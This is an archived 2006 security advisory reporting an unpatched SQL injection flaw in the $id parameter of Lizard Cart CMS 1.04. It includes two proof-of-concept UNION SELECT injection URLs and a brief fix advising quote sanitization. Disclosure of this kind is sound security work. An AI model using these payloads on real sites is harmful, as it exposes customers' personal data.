LizardCart.txt

2006-01-05T00:00:00
ID PACKETSTORM:42804
Type packetstorm
Reporter Aliaksandr Hartsuyeu
Modified 2006-01-05T00:00:00

Description

                                        
                                            `New eVuln Advisory:  
Lizard Cart CMS SQL Injection Vulnerability  
  
--------------------Summary----------------  
  
Software: Lizard Cart CMS  
Sowtware's Web Site: http://sourceforge.net/projects/lizardcart  
Versions: 1.04  
Critical Level: Dangerous  
Type: SQL Injection  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Available  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
Published: 2006.01.03  
eVuln ID: EV0012  
  
-----------------Description--------------  
Vulnerable scripts:  
pages.php  
detail.php  
  
Variable $id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.  
  
Customers personal data is threatened.  
  
Conditions:  
register_globals = on  
gpc_magic_quotes = off  
  
  
  
--------------Exploit---------------------  
http://host/lizard/pages.php?id=-1'%20union%20select%201,2,3/*  
http://host/lizard/detail.php?id=-1'%20union%20select%201,2,3,4,5,6,7,8/*  
  
Conditions:  
register_globals = on  
gpc_magic_quotes = off  
  
--------------Solution---------------------  
No patch availabve.  
Edit source code. Quotes sanitation is needed.  
  
--------------Credit---------------------  
Original Advisory:  
http://evuln.com/vulns/12/summary.html  
  
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)  
  
`